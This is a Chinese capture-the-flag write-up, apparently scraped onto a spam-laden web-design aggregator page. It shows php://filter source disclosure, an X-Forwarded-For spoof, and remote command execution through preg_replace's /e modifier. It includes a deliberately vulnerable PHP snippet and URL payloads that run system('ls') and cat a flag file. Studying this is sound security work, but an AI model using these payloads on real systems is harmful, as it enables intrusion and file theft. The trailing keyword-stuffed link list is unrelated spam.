当前位置: 首页 > news >正文

北京网站开发网站开发公司网站建设与管理实务

北京网站开发网站开发公司,网站建设与管理实务,买的服务器做两个网站,江苏网站建设空间php://filter 伪协议查看源码 preg_replace 函数漏洞 1.获取网页源代码。多点点界面,发现点云平台设备维护中心时,页面发生变化。 /?pageindex 输入什么显示什么,有回显。 用php://filter读取网页源代码 ?pagephp://filter/readconvert.…

php://filter 伪协议查看源码 + preg_replace 函数漏洞

1.获取网页源代码。多点点界面,发现点云平台设备维护中心时,页面发生变化。

/?page=index 输入什么显示什么,有回显。

用php://filter读取网页源代码

?page=php://filter/read=convert.base64-encode/resource=index.php

ctype_alnum:判断是否为数字和字符串的组合 

(1)要求 http 头的 X-Forwarded-For = 127.0.0.1

preg_replace(A,B,C)        把 C 中的 A 替换为 B。

PHP 的 preg_replace()函数存在一个安全问题:

使用 /e 修饰符,preg_replace 会将 B 当作 PHP 代码执行。

提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。

<?php
preg_replace("/test/e",$_GET["h"],"test");
?>

?pat=/(.*)/e&rep=system('ls')&sub=aa
  或者
?pat=/test/e&rep=$_GET["h"]&sub=test

?pat=/txt/e&rep=system("ls")&sub=txt

?pat=/txt/e&rep=system("ls+s3chahahaDir")&sub=txt

?pat=/txt/e&rep=system("ls+s3chahahaDir/flag")&sub=txt

?pat=/txt/e&rep=system("cat+s3chahahaDir/flag/flag.php")&sub=txt

http://www.yayakq.cn/news/589405/

相关文章:

  • 上海网站建设网页制作网站建设推广总结
  • 单位建网站怎么做莱芜哪家企业做网站
  • 巴中企业网站建设公司一定建设网站吗
  • 企业如何做网站新网站改关键词
  • 网站建设手机网站上海闵行区怎么样
  • 银行网站模板免费下载重庆企业网站开发
  • 做营销型网站用什么技术网站建设手机端页面模板
  • 传媒公司做网站编辑_如何?网页设计作业设计意图
  • 网站网络优化服务器个人网站网页模板
  • 不利于网站收录为什么检测行业不能用网站做
  • php网站开发设计论文如何建立营销型网站
  • 网站上的淘客组件是怎样做的网站的联系我们怎么做
  • 如何推广网站话术做交互设计的网站
  • pc网站做成移动网站浙江省建设建材工会网站
  • 建设端午节网站的目的主题wordpress+dux5.0
  • 网站代理网址有限公司属于什么企业类型
  • 被禁止访问网站怎么办做网站自己装服务器
  • 魔方 网站建设 有限公司给小公司做网站赚钱么
  • 2018年静安区品牌网站建设佛山网站建设公司
  • 网站开发免责说明中文域名怎样绑定网站
  • 福州网站建设效果html网页制作完整代码
  • 庆阳做网站公司网站首页设计原则
  • 北京建设教育协会网站首页新余网页制作公司
  • 鞍山建设网站徐州专业做网站较好的公司
  • 网站有什么组成网络运维管理软件
  • 网站电子签名怎么做公司高端网站建
  • 做公益网站的原因单机网页制作
  • 阿里巴巴做网站申请帝国cms调用网站名称
  • 韩国优秀网站设计建站最少需要多少钱
  • 常州个人网站设计模版网站可以做排名嘛